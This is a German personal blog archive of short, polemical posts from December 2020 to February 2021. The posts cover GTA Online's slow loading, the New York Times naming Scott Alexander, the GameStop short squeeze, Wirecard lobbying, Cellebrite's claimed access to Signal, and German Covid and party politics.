Es gibt da fähige Leute und trickreiche Lösungen, klar, aber der meiste Code ist Mist, genau wie überall sonst auch. Gerade kam dieser tolle Artikel über GTA Online an mir vorbei. Das Game ist jetzt 6 Jahre alt und lädt auf der Hardware des Autoren 6 Minuten lang. 6 Minuten!! Man stelle sich das mal vor, Firefox würde so lange brauchen! Ich krieg ja schon bei 5 Sekunden Ladezeit Wutpickel!
Dieser Typ hat sich aber nicht nur aufgeregt sondern mal ein paar Reversing-Tools angeworfen. Stellt sich raus: Die Wartezeit kommt davon, dass das Spiel 10 MB JSON parsed. Und zwar mit strlen, scanf und einer "accidentally quadratic" Datenstruktur. Falls euch accidentally quadratic nichts sagt: Googelt das mal. Das heißt, dass bei einem Algorithmus die Rechenzeit quadratisch mit der Anzahl der Elemente steigt.
Das ist leider nicht ungewöhnlich, dass solcher Code ausgeliefert wird, weil das bei kleinen Datenmengen kein Problem ist und man dann später erstmal die Crashes mit Priorität bearbeitet und Performancekram liegen lässt. Im Falle von GTA Online sechs Jahre lang.
Was hat der Typ also gemacht? Einen kleinen Hack, der diese Funktionen ersetzt. Damit war seine Ladezeit dann runter auf knapp 2 Minuten. Der Fix hätte Rockstar (haha, die heißen auch noch Rockstar!! Wie geil ist DAS denn! Und verkacken dann sowas triviales!) vielleicht ne Stunde gekostet. Stattdessen scheißen sie drauf und verplempern Jahrzehnte an Lebenszeit ihrer Kunden.
Spieleentwickler hab ich ja echt gefressen. Das sind so Leute, die Fehler nicht abfangen, weil das zuviel Performance kosten würde. Aber immer Ausreden zur Hand, wieso ihr Code so unfassbar kacke ist. Ja, äh, das war der Crunch! Zeit war knapp! Geld war alle! NA DANN MACHT HALT KEINE UNREALISTISCHEN PROJEKTE, IHR DEPPEN!

Fri Feb 26 2021

[l] Old and busted: Radionuklide in Zahnpasta.
New hotness: KI in Netzwerk-Switches.
Ich weiß gar nicht, was ich daran grotesker finde. Dass sie das überhaupt machen, oder dass sie da am Ende noch Security draufschreiben.
[l] Stellt euch mal vor, ihr seid russischer Diplomat in Nordkorea, und ihr wollt nach Hause fahren.
Aber Nordkorea hat wegen der Pandemie seit Monaten die Grenzen zugemacht. Es gibt keine Flüge, und die Landgrenzen sind auch zu.
Da muss man schon mal zu unkonventionellen Reisemitteln greifen.
In diesem Fall: Eine Draisine. Ja, es gibt ein Foto. Und Video.

Thu Feb 18 2021

[l] Japan hat gerade einen lustigen Sexismus-Skandal.
Einer der ehemaligen Premierminister hat in seiner Rolle als Chef des Tokio-Olympia-Planungsstabs in einem Interview gemeckert, dass man in Meetings ja zu nichts mehr komme, sobald man Frauen drin hat. Wenn die den Mund einmal aufgemacht haben, dann kriegst du den nicht wieder zu und verlierst Stunden!1!!
Der musste daraufhin zurücktreten.
Seine Partei dachte ich: Pass auf, das passiert uns nicht, wir setzen jetzt mal ein Zeichen.
Das Zeichen war: Frauen zu Meetings einladen. Aber Redezeit haben sie nicht gekriegt. m(

Tue Feb 16 2021

[l] Kennt ihr den schon?
Hamburgs Obdachlose erhalten Corona-Schutz aus Taiwan: Die buddhistische Hilfsorganisation Tzu Chi Foundation hat der Hamburger Diakonie 200 FFP2-Masken, 12.000 Stück medizinischen Mundschutz sowie Einmalhandschuhe und Schutzkittel gespendet, wie die Diakonie mitteilte.
Finde ich super, wenn die entwickelten Industrie-Nationen den Entwicklungsländern helfen. Ihr wisst schon, so Failed States, die es nicht schaffen, ihren Bürgern Atemmasken und Impfstoff zur Verfügung zu stellen. (Danke, Philipp)

Sun Feb 14 2021

[l] Erinnert ihr euch daran, dass Slate Star Codex plötzlich geschlossen war?
Weil irgendein Arschloch von der New York Times den Betreiber der Site zu doxxen drohte?
Der Mann postet dort unter dem Namen Scott Alexander, was aber nicht sein richtiger Name ist. Er ist Psychiater, oder besser: war Psychiater. Denn den Job hat er gerade gekündigt, um dem Arbeitgeber den Stress wegen des Doxxings zu ersparen.
Ach komm, Fefe, der reagiert doch über! Spätestens jetzt wo das einmal durchs Internet ging und die New York Times den ersten Shitstorm abgekriegt hat, da werden die ja wohl verstanden haben, dass der Artikel besser nicht erscheint, oder zumindest nicht den Namen veröffentlicht?
Doch. Doch, tun sie. Ja, wirklich. Die New York Times hat kurz gewartet, bis die Wolken weitergezogen sind, und dann haben sie bewiesen, dass Scott Alexander völlig Recht hatte mit seinen Befürchtungen.
Inhaltlich ist der Artikel so ungefähr der größte Arschloch-Move, den die nytimes pullen konnte. Nicht nur wegen des Doxxens. Der Artikel baut Scott Alexander als Anti-SJW auf, versucht ihn in die Nähe von Peter Thiel und als Teil der Silicon-Valley-Unsympathen um Sam Altman zu schieben. Es ist also sogar noch schlimmer als befürchtet.
Tja, liebe New York Times. Herzlich willkommen bei eurer Zukunft: Eine Zukunft der Irrelevanz. Alle eure Bemühungen, euch aus der Sickergrube herauszuarbeiten, in die ihr euch mit eurer Irakkrieg-Jubelperserei selber hineinnavigiert habe, sind damit vollumfänglich gescheitert, alles Restvertrauen verspielt.
Was für eine ekelerregende Zeitung, dass die das ernsthaft jetzt veröffentlichen. Ich hoffe mal, dass denen jetzt reihenweise die Abonnenten weglaufen. Newspaper of Record, hah! Dass ich nicht lache. Wie "Sturmgeschütz der Demokratie". Halten sich wie die Briten an längst verzockten Schatten eines Rufes fest.
Ehemalige Tageszeitung aus New York.
Ironie des Schicksals: In dem Artikel nennen sie ganz unverholen, wieso sie das gemacht haben. Weil die Leute da draußen das Vertrauen in die Mainstreammedien (DAS SEID ÜBRIGENS IHR, IHR DEPPEN!) verloren haben, und für gehaltvolle Gedankengänge lieber zu Scott Alexander gehen.
Das war der Grund, wieso sie diese Bewegung nochmal ordentlich befeuert haben.
Man findet aber auch einfach kein gutes Personal mehr.
Scott Alexander selbst hat dazu auch was geschrieben. Der ist ja jetzt bei Substack. Er hat noch ein paar mehr Punkte rausgegriffen, die ich hier gar nicht erwähnt habe, weil mir das schon reichte.
Update: Falls sich jemand von euch fragt, wieso ich diesen Scott Alexander so hochhalte: Hier hat jemand ein paar Highlights unter seinen Blogposts rausgesucht. Ich glaube ja, dass man da praktisch überall blind reingreifen kann, und man wird auf Exzellenz stoßen. Scott Alexander hat eine nahezu einmalige Fähigkeit, wissenschaftliche Literatur zu inhalieren und die gewonnenen Erkenntnisse verständlich und sauber zu artikulieren. Ich kann mich auch nicht erinnern, bei dem jemals einen Tippfehler gesehen zu haben, und bei der durchschnittlichen Länge seiner Texte ist das eine sehr unwahrscheinliche Beobachtung.

Thu Feb 11 2021

[l] Larry Flynt ist tot. Sein Geld hat er mit Pornos gemacht (er gründete "Hustler"), aber berühmt wurde er für seinen Einsatz für Free Speech. Flynt saß seit 1978 im Rollstuhl, weil ihn vor einem Gerichtsgebäude in Georgia ein Spinner angeschossen hat. Flynt war dort, um sich gegen eine Anklage wegen "Obszönität" zu verteidigen.
Wikipedia über seine Kämpfe vor Gericht und die Millionen-Kopfgelder, die er mehrfach für Schmutz gegen Republikaner aussetzte, mehrfach erfolgreich.

Wed Feb 10 2021

[l] Stellt euch mal vor, ihr seid ein Cop. Ihr wollt da einfach nur euren Dienst machen, ein paar Demonstrationen durch Verprügeln der Teilnehmer befrieden vielleicht, aber diese blöden Teenies von heute haben alle Smartphones und livestreamen euch bei der Arbeit.
Was tun, sprach Zeus?
Dieser Polizist in Beverly Hills hat eine innovative Idee!
Die Szene ist wie folgt: Ein bekannter Aktivist aus LA betritt ein Polizeirevier in Beverly Hills. Er hatte von der Polizei ein paar Geldstrafen aufgedrückt bekommen, und wollte jetzt mal das Body Cam Material sichten.
Einer der Polizisten im Review bemerkt, dass der Typ alles livestreamt, und dabei auch Dinge mit persönlichen Daten Dritter vor die Kamera kriegt, findet das nicht gut. Sie fragen ihn also, wieviele da zugucken. Der Aktivist ist auf Krawall gebürstet und sagt: Genug.
Daraufhin holt der eine Cop sein Telefon raus und spielt so laut es das Gerät hergibt copyright-geschützte Musik ab.
Der Polizist hat sich gedacht, der Instagram-Algorithmus erkennt das und macht den Stream aus.
Hat Instagram aber nicht gemacht, weil sie nach den vielen Beschwerden der so beschnittenen Influencer mal die Fair Use Bestimmungen genauer umgesetzt haben und jetzt sagen: Solange da auch eine visuelle Komponente bei dem Video bei ist und das nicht bloß die Musik abspielt, lassen wir das durchgehen.
Die Story ist ja so schon großartig genug, aber wird noch besser: Der Polizist heißt mit Nachnamen Fair. Wie in Fair Use.

Wed Feb 3 2021

[l] Google Cloud hat 2020 bei 13 Milliarden Dollar Umsatz 5,6 Milliarden Verlust gemacht.
Wow. Gibt es da niemanden, der den Hebel zieht?!
5,6 Milliarden, das ist fast so viel wie dieser Hedgefunds durch die Reddit-Foristen verloren hat! Wat!?!? Das blutet Google mal eben über ein Jahr raus?
Na kein Wunder, dass Google alle Nase lang vielgenutzte und geliebte Dienste zumacht. Ich habe hier gerade die Warnung gekriegt, dass mein Chromebook keine Updates mehr kriegen wird. Damit ist Google der einzige (!) Marktteilnehmer, der es schafft, einen Webbrowser alszuliefern, der keine Security-Patches mehr kriegt. Microsoft macht es besser, Apple macht es besser, Chromium macht es besser, fucking Mozilla macht es besser! Nur Google hält das für ein akzeptables Geschäftsgebahren, Kunden einfach ins Gesicht zu sagen, sie können die Geräte ja gerne weiter nutzen, wenn ihnen ihre Daten darauf nicht so viel wert sind.
Ja toll, Google, dann wandelt mal euer Geld weiter in Wolken um. Per Verbrennung.

Tue Feb 2 2021

[l] Harburger DRK-Chef mit sofortiger Wirkung von allen Aufgaben entbunden. Warum? Offiziell: Gesundheitliche Gründe. Inoffiziell:
Aus unerklärlichen Gründen gab es am 29. Dezember für 60 Dosen keine Verwendung – und deshalb wurden Mitarbeiter des DRK damit beglückt, allerdings nicht nur Einsatzpersonal. Etliche Impfdosen wurden ausgerechnet der sogenannten „Teppich-Etage“ verabreicht – gemeint sind Personen aus der Führungsetage des Harburger Kreisverbandes – inklusive Ehefrauen!
Da ergießt sich der gerechte Zorn der Hamburger Morgenpost über dem Roten Kreuz! Das geht ja mal GAR nicht!
Wenn ich das lese, dann denke ich mir: Wieviele investigative Journalisten und Außenmitarbeiter hat eigentlich die Hamburger Morgenpost noch? Ist das nicht vielleicht auch komplett eine "Teppich-Etage", die im Wesentlichen Werbung produziert und da ein bisschen dpa und Geifer drübersprenkelt?
Und lass mich raten: Die halten sich selbst für systemrelevant? Präziser: Fordern für sich selbst bevorzugten Zugang zum Impfstoff?
Ich kann ja die Kritik nachvollziehen, aber gucken wir dochmal genau hin. Der hatte Dosen über und hat ein paar dafür (nicht alle!) an Leute aus der DRK-Verwaltung verteilt. Das DRK betreibt Impfzentren (zumindest in Berlin). Ich fände das schon gut, wenn die Verwaltung nicht wegen Covid ausfällt und die Bezahlung der Mitarbeiter an der Front und die materielle Versorgung der Impfzentren gewährleistet wäre. Ich finde das in Ordnung, die Verwaltung der Betreiber der Impfzentren zu impfen. Hätte ich auch gemacht.
Mich ekelt ja solche Geifer-Demagogie an. Hey, Mopo, versucht es doch mal mit ehrlicher Arbeit! Wie wäre es mit ... Journalismus?
Übrigens, am Rande: Der Biontech-Impfstoff kommt nach Verdünnung häufig auf 6 statt 5 Dosen. Offiziell sind aber nur 5 Dosen drin. Anfangs wurde daher die 6. Dosis weggeworfen. Der 29. Dezember war die Zeit, als die 6. Dosis Verwendungs-Erlaubnis bekam. Ich vermute mal, dass das der Hintergrund hinter den "unerklärlichen Gründen" (toller Journalismus übrigens, Mopo! Beeindruckende Arbeit!!1!) ist. Die hatten da angebrochene verimpfte Ampullen und hörten, dass das verwendet werden darf, also haben sie es verwendet.
Ich muss bei dieser ganzen Debatte immer an Desasterfilme denken. Die erste Impfdosis geht an den Präsidenten, die Frage stellt sich da gar nicht. Dann wird einmal die Führungsriege des Militärs durchgeimpft. Ich finde das ja gut, dass wir hier als Zivilgesellschaft nach Bedürftigkeit gehen und nicht nach Hierarchie, aber wir sollte da mal nicht päpstlicher als der Papst sein.

Fri Jan 29 2021

[l] Diese Wirecard-Eiterblase blubbert immer noch weiter.
Aktuell: BaFin hat Wirecard einfach geglaubt, dass sie von Bloomberg und Financial Times erpresst werden und auf Basis dieser Behauptung ein Leerverkaufsverbot erlassen.
Die BaFin kann glaube ich einfach mal abgerissen werden. Oder fällt jemandem ein einziges Beispiel ein, wo die mal was richtig gemacht haben?

Wed Jan 27 2021

[l] An der Wall Street passiert gerade ein ungewöhnliches Spektakel. In den USA gibt es eine Videospiele-Einzelhandelskette namens Gamestop. In meinem Weltbild hätten die eigentlich seit Jahren pleite sein müssen. Keine Ahnung, wieso es die noch gibt. Jetzt mit Covid würde man annehmen, dass die jetzt endlich pleite gehen.
Nun haben sich das diverse Hedgefonds und andere institutionelle Anleger (Zocker) die Situation angeguckt und sind zu einem ähnlichen Ergebnis wie ich gekommen. Wenn man professioneller Börsenzocker ist, und sich sicher ist, dass eine bestimmte Firma auf dem absteigenden Ast ist, dann kann man Short Selling machen. Man leiht sich Aktien der Firma und verkauft die dann. Ein paar Tage später muss man die zurückgeben. Zu dem Zeitpunkt kauft man dann Aktien der Firma und gibt sie an den Verleiher zurück. Wenn der Kurs seit dem gefallen ist, macht man die Differenz Profit.
Das hat zwei Probleme. Erstens: Was wenn der Kurs nicht fällt? Wenn man eine Aktie kauft und die ist morgen wertlos, hat man maximal sein eingesetztes Kapital verloren. Wenn man Short Selling macht, und sich der Aktienwert mehr als verdoppelt, dann hat man mehr Geld verloren als man eingesetzt hat. Das ist also hochgefährlich.
Zweitens: Es kann sein, dass auch die Verleiher die Aktie gar nicht hatten. Die Börse ist im Wesentlichen ein Kasino, wo lauter habituelle Glücksspieler sich gegenseitig abzuzocken versuchen. Es kann vorkommen, dass mehr Aktien verkauft wurden, als es gibt, und dass es gar nicht möglich ist, dass die Short Seller nach ein paar Tagen ihre Aktien "zurückkaufen". Das ist 2008 mit Porsche und VW passiert. Da hat Porsche angesagt, dass sie ihren Anteil bei VW erhöht haben, und dass sie Optionsscheine halten, die eingelöst ihren Anteil auf 75% oder so erhöht hätten. Daraufhin fiel den Short Sellern auf, dass sie mehr als den Rest der Aktien ausstehend hatten, und die mussten alle zu egal welchem Preis Aktien kaufen, um ihre ausstehenden Positionen zu füllen. Wenn alle kaufen wollen, aber keiner verkauft, dann geht der Preis hoch. Bei VW ging der Aktienkurs kurzzeitig von 200 auf 1000 Euro hoch.
Und so etwas passiert auch gerade bei Gamestop. Da haben sich ein paar Kiddies in Webforen abgesprochen und als Flashmob Gamestop-Aktien gekauft, mit dem expliziten Ziel, sie nicht an die Short Seller zu verkaufen. Die Tagesschau hat einen schönen Kurschart von Gamestop.
Ich erwähne das, weil Louis Rossman ein tolles Video dazu gemacht hat, das ist der Typ hinter Right to Repair, der mit dem Repair Shop in New York. Und der hat eine wunderschöne Interpretation der Situation: Dass die Leute, die die Aktien gerade halten, das absichtlich gemacht haben, und zwar nicht um sich zu bereichern, sondern um Wall Street mal den Stinkefinger zu zeigen. Das sei sozusagen die Rache der Betrogenen an den Betrügern, die Rück-Umverteilung des Reichtums von den Wall-Street-Zockern zu den Abgezockten.
Das ist ja an sich schon lustig, aber jetzt kommt halt ein Detail hinzu, dass das blogwürdig macht: In den USA gibt es eine Aktienhandelapp, die sich explizit an unerfahrene Hobbyisten richtet, und die die Hürden für das Verzocken des eigenen Vermögens an der Börse super niedrig legt. Die heißt ausgerechnet Robinhood.
Der Name passt jetzt zufällig mal wie Arsch auf Eimer, wenn Louis' Theorie zutrifft.
Besonders lustig finde ich auch, wie sich jetzt die Memes überschneiden, und die Gamestop-"Anleger" in den Foren "HODL" rufen, den "niemals verkaufen!!1!"-Schlachtruf der Bitcoin-Spinner, ursprünglich ein Tippfehler von "hold", was das Wort ist, das man an der Börse für "halten" nimmt im Englischen, also für "nicht verkaufen".

Mon Jan 25 2021

[l] Old and busted: ARM disrupts Intel.
New hotness: RISC-V disrupts ARM.
Finde ich gut. Die Chinesen haben den Schuss offensichtlich gehört.
Die haben die Open-Source-Version von Android 10 auf RISC-V portiert. Alles Open Source, nichts von westlichen Möchtegerne-Handelskriegführern abklemmbar.
Natürlich kann der Westen immer noch den Import verweigern, klar. Aber der Westen kann dann nicht mehr chinesischen Herstellern ihre Produkte im chinesischen Markt kaputtmachen. Von den Wachstumszahlen her ist der eh ein viel wichtigerer Markt als die EU oder die USA.
Das Problem für den Westen ist, dass bei solchen unilateralen Gewaltakten (wie als Google den Chinesen die Kommerz-Version von Android verboten hat) meist erst nach Jahren der volle Schaden klar wird. Nehmt nur die Bundesregierung. Die hat vor Jahren Hackertools verboten und hat immer noch nicht kapiert, wieviel sie damit langfristig kaputtgemacht hat.
Na dann kauft mal weiter eure Firewalls und Router bei den "freundlichen" Geheimdiensten, die schon Merkels Telefon abgehört haben!

Wed Jan 20 2021

[l] Erinnert ihr euch noch an den Wahlkampf von Donald Trump?
Er hatte im Wesentlichen zwei Wahlversprechen.
1. Make America Great Again
2. Drain The Swamp
Das mit dem Great Again lief nicht so gut, aber gucken wir doch mal auf den Swamp. Da hatte Trump in der Tat etwas bewegt. Er hat eine Executive Order gemacht, dass Mitglieder und Berater des Regierungsapparats danach für fünf Jahre keine Lobbyisten-Jobs annehmen dürfen.
Das hat er jetzt noch schnell widerrufen.

Sun Jan 17 2021

[l] Will jemand von euch Parler beim Hosting helfen?
Hier sind ihre Hosting-Anforderungen (Achtung: Hörensagen). Oh, und: Geld dafür bezahlen können sie natürlich nicht. Die haben noch nie einen Cent Profit gemacht.
Warte mal eine Chat-App macht extern 100 GB Traffic pro Minute?! Und intern 400 GB?!?
Tja, meine Damen und Herren. So sieht das Trafficmuster aus, wenn man Netflix-Style ein paar Fantastilliarden Microservices betreibt. Und so sieht der CPU- und RAM-Bedarf aus, wenn man das in Ruby on Rails macht.
Das ist auch der Grund, wieso es PHP noch gibt.
Es ging ja auch das Gerücht um, dass das dezentrale Backup, dass jemand noch kurz vor Rauswurf bei AWS gemacht hat, 70 TB groß ist.
Das ist m.E. ein typisches Cloud-Symptom. Wenn das nicht bei dir sondern bei Amazon wehtut, wieso solltest du dann die Anwendung optimieren? Wenn Storage virtualisiert ist, wieso dann in Sparsamkeit investieren? Die 70 TB kommen wohl daher, dass die nie was gelöscht sondern nur "als gelöscht markiert" haben.
Die Trafficmenge kommt wohl davon, dass die auch Bilder und Videos hatten. Das bläst natürlich die Trafficrechnung enorm auf.

Sat Jan 16 2021

[l] Der CDU-Parteitag lief ungefähr so, wie es zu erwarten war.
Das Personal besteht ja aus einem Versager (Laschet) und zwei transatlantischen Neocon-Überzeugungstätern (Merz und Röttgen).
Den Versager haben sie schnell zum Parteichef gemacht, damit er den Ambitionen anderen nicht im Weg steht.
Die beiden anderen haben sich zu profilieren versucht.
Merz hat dabei erstmal so richtig verkackt und durchscheinen lassen, dass er Wirtschaftsminister werden will. Das ist gleichzeitig das Eingeständnis, dass er sich als Kanzlerkandidat keine Erfolgschancen ausmalt.
Das beruhigt mich enorm, sage ich euch.
Und Röttgens Auftritt war offenbar so einschläfernd, dass er der Tagesschau nicht mal eine Meldung wert war.
Doch eine Meldung wert war Spahn. Dessen vollständiges Totalverkacken bei Covid ist offenbar sogar der CDU-Basis aufgefallen.
In meinem Bekanntenkreis führt sich gerade "spahnen" als Verb in den Sprachgebrauch ein. "Alter Falter, das hast so ja mal so richtig verspahnt!"
Ich finde auffallend, dass der Merz auch echt zermürbt und müde aussieht. Wie so ein 80-Jähriger, bei dem sie mit Makeup zu retten versucht haben was ging, aber das war halt nicht viel. Ich fühle mich an den Ratzinger erinnert, wenn ich das Foto sehe. Ich hoffe mal, der ist damit endgültig weg vom Fenster.
Tja, damit bleiben für die Zukunft der CDU zwei Varianten. Angriff mit einer Lusche oder sanftes Einschläfern mit Röttgen. Beides wäre denen zuzutrauen.

Wed Jan 13 2021

[l] Stört euch das auch so, wie sich jetzt alle an dem Trump abarbeiten?
Ich krieg da Würgreiz.
Seit Jahren marodiert der herum und trampelt alles platt, und jetzt merken die alle, dass das ein unseriöser Hochstapler mit Hang zum Dauerlügen ist?
Nee, Leute, sorry, aber jetzt ist es zu spät. Jetzt beschmutzt ihr eher euch selbst als den Trump. Denn jetzt beweist ihr, dass eure Moral nur gegen Schwächere gilt. Leute, die nur gegen Schwächere kämpfen, und Ethik und Moral nur anwenden, wenn sie selbst dadurch kein Risiko tragen, an denen bin ich nicht interessiert.
Trotzdem kann ich bei Meldungen wie dieser hier eine gewisse Schadenfreude nicht leugnen. Trumps Außenminister Pompeo musste angeblich seine Europareise absagen, weil niemand dort mit ihm reden wollte.
Das hätte man aber schon deutlich früher machen können, ja machen müssen. Nur wie denn, wenn es sich 80% unserer Eliten im Arsch der USA bequem gemacht haben?

Tue Jan 12 2021

[l] Ach nee, das hatte ich ja gar nicht mitgekriegt! Es gab ein Leerverkaufsverbot für Wirecard-Aktien. Dafür gesorgt hat offenbar der feine Herr von und zu Guttenberg. Im Untersuchungsausschuss darauf angesprochen, hat er das vor dem Ausschuss schlicht geleugnet.
Also nicht dass er das gemacht hat, nein. Dass er das für Wirecard gemacht hat. Die ihn damals für Lobbyarbeit bezahlt haben, und genau das haben wollten. Das war bloß ein bedauerliches Missverständnis. Zufälle gibt es!
Gut, dabei hätte die Sache bleiben können, aber leider tauchte dann ein "Aktionsplan Leerverkäufe" auf.
Diesen schickte Rüdiger Assion, Leiter der Finanzkommunikation bei der PR-Agentur Edelman, am 20. März 2020 an Wirecard-Chef Markus Braun – sechs Tage vor Erscheinen von Guttenbergs Beitrag. Das Papier sah Ansprechpartner in Politik, Medien und bei der Börse vor, bei denen offensichtlich für ein Leerverkaufsverbot geworben werden sollte. Unter »Zielgruppe Medien« wird aufgeführt: »Gastkommentar Karl-Theodor zu Guttenberg, FAZ oder Die Welt«.
Neben Guttenberg wurde auch Kai Diekmann genannt. Da wächst zusammen, was zusammen gehört!
Jedenfalls gab es danach tatsächlich einen FAZ-Kommentar von Guttenberg, der inhaltlich dem Lobbyauftrag weitestgehend entsprach.

Fri Jan 8 2021

[l] Neil Sheehan ist tot. Er ist der Journalist bei der New York Times, der die Pentagon Papers öffentlich gemacht hat. Vor seinem Tod hat er noch ein Interview zu Protokoll gegeben, mit der Maßgabe, das erst nach seinem Tod zu veröffentlichen.
Stellt sich raus: Die New York Times hat ihre Quelle, Daniel Ellsberg, nach Strich und Faden verarscht, verraten und hintergangen. Ellsberg hatte denen die Pentagon Papers gegeben, damit sie sie mal angucken, aber sie sollten keine Kopien machen und nichts davon direkt drucken. Ellsberg nahm an, dass er als Quelle sonst enttarnt würde und die volle Wucht der staatlichen Rache abkriegen würde.
Tatsächlich war es auch so, dass die Nixon-Regierung das FBI eine Treibjagd auf Ellsberg machen ließ, und die waren so nah dran, dass Ellsberg die Vorwärtsverteidigung antrat und sich öffentlich bekannte, zwei Tage bevor der Supreme Court das Urteil fällte, dass die New York Times doch weiter publizieren darf und die Zensur-Order der Regierung ungültig sei.
Ellsberg selbst hat den Verrat durch die New York Times so erfahren:
The publication of the first installment of the Pentagon papers on June 13, 1971, blindsided Mr. Ellsberg. He learned it was imminent from another Times staff member, Anthony Austin, with whom he had secretly shared an excerpt months before. Mr. Austin had chosen not to mention the bombshell to anyone at the newspaper, preferring to keep it for a book he was writing about the war.
Die haben also nicht nur ihre Quellen betrogen sondern sich auch gegenseitig. Und DIE gelten als Vorbild für Journalismus weltweit!
Rückblickend würde ich das so formulieren, dass Wikileaks sich professioneller verhalten hat und seine Quellen besser geschützt hat als die New York Times ihre.
So, und nun, äh ... warum ist Julian Assange eigentlich immer noch nicht auf Kaution frei?

Wed Jan 6 2021

[l] Na sowas! Kaum macht man die Schulen zu, halbiert sich die Inzidenz bei Schülern!
Woran das wohl liegt?
Werden wir wohl nie rausfinden!
Kommt, lasst uns schnell die Schulen wieder aufmachen!1!!
Laut jüngsten RKI-Daten halbierte sich die Sieben-Tage-Inzidenz bei Schülern. Unklar ist, ob dies nur an Schließungen liegt.
Ein Mysterium!!1!
Ich glaube ja, die Zahnfee spielt da auch eine Rolle. Und der Weihnachtsmann. Also der andere jetzt. Nicht der, der in Belgien das Altersheim mit Covid infiziert hatte.
Update: In Österreich haben sie die Schulen übrigens nicht zu- sondern aufgemacht. Ergebnis: Infektionsrate verdreifacht.
Ob es da einen Zusammenhang gibt?
Werden wir wohl nie erfahren!
Die Wege des Herrn sind unergründlich!11!!

Tue Jan 5 2021

[l] Lacher am Rande: Rituelles Wokeness-Gebet im US-Congress endet mit "Amen … and a woman". Nein, keine Satire. Gibt ein Video.
Apropos Wokeness-Brigaden: Satire wird ja immer schwieriger. Du kannst eine postmoderne Ideologie nicht mit Satire bekämpfen. Wenn eine Ideologie nicht auf Fakten sondern auf Gefühlen basiert, dann gibt es schlicht kein Limit. Mit deiner Satire gibst du denen nur Ideen, wohin sie gehen können.
Es gibt da in England eine schöne Tradition von Satire-Guardian-Kolumnisten. Die bekanntesten sind Godfrey Elfwick und Titania McGrath. Elfwick wurde zwischenzeitlich enttarnt und hat seine Arbeit eingestellt, um dann beim Spectator wieder aufzutauchen (eine ansonsten nicht erwähnenswerte rechte Postille aus Amerika). Auch Titania wurde zwischenzeitlich enttarnt, hat aber einfach weitergemacht. Hat sogar mehrere Bücher veröffentlicht, die man so richtig im echten Buchhandel kaufen konnte. Die hat neulich eine Liste mit ihren satirischen Scherzen gemacht, die dann später Realität wurden.
Und was sehe ich, wenn ich auf ihren Account klicke?
Caution: This account is temporarily restricted
Wokeness, fuck yeah!
Falls ihr ein Beispiel für die Art von Humor wollt, die es bei Titania gab: Hier ist ein schönes.
This chart breaks down coronavirus cases by gender.
A year into this pandemic, and non-binary people are *still* totally immune!
I always knew they were superior.

Mon Jan 4 2021

[l] Google-Mitarbeiter gründen eine Gewerkschaft.
Wat? Das gibt es noch? Gewerkschaftsgründungen in den USA?!
Hier ist die Webseite der Gewerkschaft. Es geht ihnen um Social Justice.
Finde ich gut. Wenn es etwas gibt, wovon Google zu wenig hat, dann ist es Social Justice. Der Laden kann gar nicht genug kaputtgemacht werden.
Aber, äh, tut mir einen Gefallen. Macht die Datenkraken-Infrastruktur kaputt, nicht die Suchmaschine!

Wed Dec 30 2020

[l] Wisst ihr noch, wie wir uns über die Amis lustig gemacht haben, als der Trump meinte, die hohe Inzidenz käme ja von den vielen Tests, und man müsse halt die Tests zurückfahren, dann seien die Zahlen auch wieder besser?
Hamburg schließt zum 15. Januar das Corona-Testzentrum am Hauptbahnhof. Begründung: Es gibt neue Bestimmungen zur Testung symptomloser Menschen.
Wie sehen diese Bestimmungen aus?
Ganz einfach! Die werden nicht mehr getestet.

Wed Dec 23 2020

[l] Im Moment geht eine Meldung herum, dass Cellebrite angeblich Signal knacken kann.
Cellebrite baut so Exploits für Smartphones und verkauft das an "Sicherheitsbehörden", die damit "den Terroristen" die Handys aufmachen.
Signal speichert eure Chatverläufe verschlüsselt auf dem lokalen Gerät. Der Schlüssel ist in Hardware abgelegt. Wenn das Gerät aufgeschlossen ist, kommt man da ohne weitere Nachfrage ran. Deshalb kann Signal euch eure Chatverläufe anzeigen, wenn ihr es startet.
Was Cellebrite jetzt gemacht hat: Sie haben das Android Keystore API gegoogelt, mit dem man den Key abfragt, und dann ein externes Tool namens SQLCipher installiert, und dann haben sie im offenen Quellcode von Signal geguckt, wie sie SQLCipher mit dem Key aufrufen müssen. Deren Leistung an der Stelle ist … sehr überschaubar.
Diese Meldung könnt ihr getrost ignorieren. Wenn Signal eure Chatverläufe ohne weiteres Passwort anzeigen kann, dann kann das auch Cellebrite. Das war ja wohl irgendwie offensichtlich oder nicht?
Leider hat sich Bruce Schneier an der Stelle geäußert und mit dem Blogeintrag voll ins Klo gegriffen. Es gibt da keine Vulnerability. Die rufen genau die dafür gedachten APIs genau so auf, wie sie gedacht waren. Das funktioniert nur, wenn das Telefon aufgeschlossen ist. Daher schließt sich euer Telefon bei Inaktivität von alleine ab.
Sorgen müsst ihr euch machen, wenn Cellebrite euer Telefon aufschließen kann. Nicht wenn sie danach Daten abgreifen können. Das ist gewollt, dass der angemeldete Benutzer aus einem aufgeschlossenen Gerät die Daten sehen kann.
[l] Bei Radioeins gibt es seit September oder so einen Podcast von Florian Schröder und Serdar Somuncu, den ich jetzt seit ein paar Tagen mal gehört habe.
Das fällt einem wahrscheinlich nur auf, wenn man das am Stück hört, aber du kannst da im Grunde zwei Typen zuhören, wie sie in der Coronakrise langsam den Verstand verlieren, den Optimismus, die Perspektive, und den Willen zum Leben. In Folge 8 kommt man sich vor, als säße man bei einem Psychiater auf der Couch. Da stellen die sich plötzlich gegenseitig Fragen wie: Magst du dich eigentlich selbst?
Wenn das kein Podcast wäre sondern ich zwei Kumpels sowas besprechen hören würde, würde ich mir glaube ich echt Sorgen machen.
Die Folgen am Anfang sprühten noch von Optimismus, und dann legt sich so eine bleierne Depression über die Sendung.
Ich erwähne das, weil mir ja seit Jahren Leute schreiben, ich hätte ja eine Verantwortung gegenüber meinen Lesern, der ich angeblich nicht gerecht würde, wenn ich nicht immer nur 100% vorvalidierte vorverdaute Einheitskost bringe, von der sich nichts später als falsch herausstellt. Ich fand das immer absurd. Ich bin hier keine Redaktion mit geschulten Journalisten, ich bin nur ein Typ mit einem Webserver. Mir fällt auch gerade kein Medium ein, das nicht mal irgendwann grob daneben lag.
Aber jetzt komme ich ins Grübeln, ob ich da nochmal über meine Position nachdenken muss. Nicht von wegen Medienkompetenzübungen, eher von wegen bei den Lesern Depressionen auslösen oder verschlimmern.
